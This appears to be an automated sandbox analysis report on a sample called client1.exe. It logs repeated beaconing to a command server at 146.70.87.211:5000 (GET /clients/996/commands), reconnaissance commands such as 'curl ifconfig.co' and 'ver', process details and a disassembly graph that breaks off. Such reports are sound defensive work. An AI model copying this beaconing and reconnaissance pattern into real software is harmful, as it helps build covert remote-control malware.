                                                  Nov 4, 2024 09:50:16.778744936 CET497245000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:16.783529043 CET500049724146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:21.790030956 CET497255000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:21.840755939 CET500049725146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:21.840837955 CET497255000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:21.840990067 CET497255000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:21.845796108 CET500049725146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:22.472575903 CET500049725146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:22.472702980 CET497255000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:22.478147030 CET497255000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:22.729926109 CET500049725146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:22.729981899 CET497255000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:22.730832100 CET500049725146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:27.480331898 CET497265000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:27.485203028 CET500049726146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:27.485301018 CET497265000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:27.485373974 CET497265000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:27.490178108 CET500049726146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:28.014653921 CET500049726146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:28.014795065 CET497265000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:28.014859915 CET497265000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:28.019706011 CET500049726146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:33.017357111 CET497275000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:33.022273064 CET500049727146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:33.022367001 CET497275000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:33.022425890 CET497275000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:33.027827978 CET500049727146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:33.528086901 CET500049727146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:33.528228998 CET497275000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:33.528377056 CET497275000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:33.533225060 CET500049727146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:38.530678988 CET497305000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:38.535542965 CET500049730146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:38.535619020 CET497305000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:38.535686016 CET497305000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:38.540471077 CET500049730146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:39.036963940 CET500049730146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:39.037094116 CET497305000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:39.037220955 CET497305000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:39.042013884 CET500049730146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:44.039870024 CET497315000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:44.045089960 CET500049731146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:44.045200109 CET497315000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:44.045330048 CET497315000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:44.050358057 CET500049731146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:44.553555965 CET500049731146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:44.553630114 CET497315000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:44.553755999 CET497315000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:44.558845997 CET500049731146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:49.556010962 CET497325000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:49.560995102 CET500049732146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:49.561132908 CET497325000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:49.561132908 CET497325000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:49.566071033 CET500049732146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:50.066209078 CET500049732146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:50.066440105 CET497325000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:50.066481113 CET497325000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:50.071280003 CET500049732146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:55.068658113 CET497335000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:55.073659897 CET500049733146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:55.073787928 CET497335000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:55.073851109 CET497335000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:55.078716040 CET500049733146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:55.706204891 CET500049733146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:55.706404924 CET497335000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:55.706625938 CET497335000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:55.711469889 CET500049733146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:00.725275040 CET497345000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:00.730321884 CET500049734146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:00.730420113 CET497345000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:00.730496883 CET497345000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:00.735308886 CET500049734146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:01.236129999 CET500049734146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:01.236182928 CET497345000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:01.236377001 CET497345000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:01.241218090 CET500049734146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:06.241374969 CET497355000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:06.246557951 CET500049735146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:06.246774912 CET497355000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:06.249640942 CET497355000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:06.254513979 CET500049735146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:06.756910086 CET500049735146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:06.756963968 CET497355000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:06.758027077 CET497355000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:06.762821913 CET500049735146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:11.760324955 CET497365000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:11.765466928 CET500049736146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:11.765616894 CET497365000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:11.765666008 CET497365000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:11.770507097 CET500049736146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:12.266064882 CET500049736146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:12.266146898 CET497365000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:12.266246080 CET497365000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:12.271037102 CET500049736146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:17.293462992 CET497375000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:17.298472881 CET500049737146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:17.298578978 CET497375000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:17.335611105 CET497375000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:17.340735912 CET500049737146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:17.804378986 CET500049737146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:17.804469109 CET497375000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:17.804599047 CET497375000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:17.809329987 CET500049737146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:22.960197926 CET497385000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:22.965121984 CET500049738146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:22.965213060 CET497385000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:22.965276957 CET497385000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:22.970398903 CET500049738146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:23.470443964 CET500049738146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:23.470560074 CET497385000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:23.470695972 CET497385000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:23.477209091 CET500049738146.70.87.211192.168.2.8

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 4, 2024 09:49:21.044339895 CET6119153192.168.2.81.1.1.1
                                                  Nov 4, 2024 09:49:21.051662922 CET53611911.1.1.1192.168.2.8

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Nov 4, 2024 09:49:21.044339895 CET192.168.2.81.1.1.10x616fStandard query (0)ifconfig.coA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Nov 4, 2024 09:49:21.051662922 CET1.1.1.1192.168.2.80x616fNo error (0)ifconfig.co172.67.168.106A (IP address)IN (0x0001)false
                                                  Nov 4, 2024 09:49:21.051662922 CET1.1.1.1192.168.2.80x616fNo error (0)ifconfig.co104.21.54.91A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • 146.70.87.211:5000
                                                  • ifconfig.co

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.849706146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:49:20.929239035 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.849709172.67.168.106804032C:\Windows\System32\curl.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:49:21.062191010 CET75OUTGET / HTTP/1.1
                                                  Host: ifconfig.co
                                                  User-Agent: curl/7.83.1
                                                  Accept: */*
                                                  Nov 4, 2024 09:49:21.781905890 CET757INHTTP/1.1 200 OK
                                                  Date: Mon, 04 Nov 2024 08:49:21 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 15
                                                  Connection: keep-alive
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FI7ZML8J7ZFwHSUnqUrZ2axJojgjp9EnmM8IfEuZMtxjbHyuffPEsiwOAUpKcBJcjwCJSnVDTJDGWlCfdQ906VbxaQLd8FG79oPs6udgtsWYvz3hSIeGZckMtxBOzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8dd359adf88f6b65-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1240&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=75&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 0a
                                                  Data Ascii: 173.254.250.69


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.849710146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:49:26.449234009 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.849711146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:49:31.968652010 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.849716146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:49:37.516756058 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.849717146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:49:43.029470921 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.849718146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:49:48.544023991 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.849719146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:49:54.077294111 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.849720146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:49:59.591022968 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.849721146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:50:05.110410929 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.849722146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:50:10.623347998 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.849724146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:50:16.290586948 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.849725146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:50:21.840990067 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.849726146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:50:27.485373974 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.849727146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:50:33.022425890 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.849730146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:50:38.535686016 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.849731146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:50:44.045330048 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  17192.168.2.849732146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:50:49.561132908 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  18192.168.2.849733146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:50:55.073851109 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  19192.168.2.849734146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:51:00.730496883 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  20192.168.2.849735146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:51:06.249640942 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  21192.168.2.849736146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:51:11.765666008 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  22192.168.2.849737146.70.87.21150006776C:\Users\user\Desktop\client1.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:51:17.335611105 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  23192.168.2.849738146.70.87.2115000
                                                  TimestampBytes transferredDirectionData
                                                  Nov 4, 2024 09:51:22.965276957 CET173OUTGET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:03:49:16
                                                  Start date:04/11/2024
                                                  Path:C:\Users\user\Desktop\client1.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\client1.exe"
                                                  Imagebase:0x7ff79f620000
                                                  File size:11'677'281 bytes
                                                  MD5 hash:950C13286D42AD2DA05B1778C1E2D747
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:2
                                                  Start time:03:49:18
                                                  Start date:04/11/2024
                                                  Path:C:\Users\user\Desktop\client1.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\client1.exe"
                                                  Imagebase:0x7ff79f620000
                                                  File size:11'677'281 bytes
                                                  MD5 hash:950C13286D42AD2DA05B1778C1E2D747
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:3
                                                  Start time:03:49:19
                                                  Start date:04/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "curl ifconfig.co"
                                                  Imagebase:0x7ff701740000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:03:49:19
                                                  Start date:04/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:03:49:19
                                                  Start date:04/11/2024
                                                  Path:C:\Windows\System32\curl.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:curl ifconfig.co
                                                  Imagebase:0x7ff60ea90000
                                                  File size:530'944 bytes
                                                  MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:03:49:20
                                                  Start date:04/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                  Imagebase:0x7ff701740000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:03:49:20
                                                  Start date:04/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:10%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:16.7%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:26
                                                    execution_graph 18235 7ff79f63fa08 18236 7ff79f63fa2c 18235->18236 18239 7ff79f63fa3c 18235->18239 18237 7ff79f634444 _findclose 11 API calls 18236->18237 18260 7ff79f63fa31 18237->18260 18238 7ff79f63fd1c 18241 7ff79f634444 _findclose 11 API calls 18238->18241 18239->18238 18240 7ff79f63fa5e 18239->18240 18242 7ff79f63fa7f 18240->18242 18366 7ff79f6400c4 18240->18366 18243 7ff79f63fd21 18241->18243 18246 7ff79f63faf1 18242->18246 18248 7ff79f63faa5 18242->18248 18255 7ff79f63fae5 18242->18255 18245 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18243->18245 18245->18260 18251 7ff79f63dd40 _findclose 11 API calls 18246->18251 18264 7ff79f63fab4 18246->18264 18247 7ff79f63fb9e 18259 7ff79f63fbbb 18247->18259 18265 7ff79f63fc0d 18247->18265 18381 7ff79f638518 18248->18381 18252 7ff79f63fb07 18251->18252 18256 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18252->18256 18254 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18254->18260 18255->18247 18255->18264 18387 7ff79f6464ac 18255->18387 18261 7ff79f63fb15 18256->18261 18257 7ff79f63facd 18257->18255 18267 7ff79f6400c4 45 API calls 18257->18267 18258 7ff79f63faaf 18262 7ff79f634444 _findclose 11 API calls 18258->18262 18263 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18259->18263 18261->18255 18261->18264 18269 7ff79f63dd40 _findclose 11 API calls 18261->18269 18262->18264 18266 7ff79f63fbc4 18263->18266 18264->18254 18265->18264 18268 7ff79f6424fc 40 API calls 18265->18268 18276 7ff79f63fbc9 18266->18276 18423 7ff79f6424fc 18266->18423 18267->18255 18270 7ff79f63fc4a 18268->18270 18271 7ff79f63fb37 18269->18271 18272 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18270->18272 18274 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18271->18274 18275 7ff79f63fc54 18272->18275 18274->18255 18275->18264 18275->18276 18277 7ff79f63fd10 18276->18277 18281 7ff79f63dd40 _findclose 11 API calls 18276->18281 18280 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18277->18280 18278 7ff79f63fbf5 18279 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18278->18279 18279->18276 18280->18260 18282 7ff79f63fc98 18281->18282 18283 7ff79f63fca9 18282->18283 18284 7ff79f63fca0 18282->18284 18286 7ff79f6391ac __std_exception_copy 37 API calls 18283->18286 18285 